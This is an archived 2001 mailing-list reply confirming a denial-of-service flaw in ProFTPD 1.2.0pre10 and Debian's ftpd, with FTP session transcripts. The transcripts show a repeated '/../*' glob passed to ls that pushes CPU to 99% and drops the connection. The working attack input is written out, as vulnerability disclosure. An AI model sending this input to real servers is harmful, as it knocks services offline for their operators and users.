At 00:43 21-8-2001, you wrote: >Couldn't reproduce on Debian 2.2.... > >isp-server-03:/# proftpd -v > - ProFTPD Version 1.2.0pre10 I tested it on my Debian 2.2 machine and: :/# proftpd -v - ProFTPD Version 1.2.0pre10 Verbonden met . 220 ProFTPD 1.2.0pre10 Server (Debian) [] Gebruiker ( :(none)): 331 Password required for . Wachtwoord: 230 User logged in. ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* 200 PORT command successful. 550 No files found. ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* 200 PORT command successful. Verbinding verbroken door externe host. ftp> CPU goes to 99.1 % and after the second attempt the connection to the server is broken.. Debian 2.2 ftpd 0.11-8potato.1 is vulnerable too: Verbonden met . 220 FTP server (Version 6.2/OpenBSD/Linux-0.10) ready. Gebruiker ( :(none)): 331 Password required for . Wachtwoord: 230- Linux 2.2.19pre17 #1 Tue Mar 13 22:37:59 EST 2001 i686 unknown 230- 230 User logged in. ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* 200 PORT command successful. 550 not found ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* 200 PORT command successful. Verbinding verbroken door externe host. ftp> CPU goes to 99.1 % and after the second attempt the connection to the server is broken..
This archive was generated by hypermail 2b30 : Mon Aug 20 2001 - 16:52:27 PDT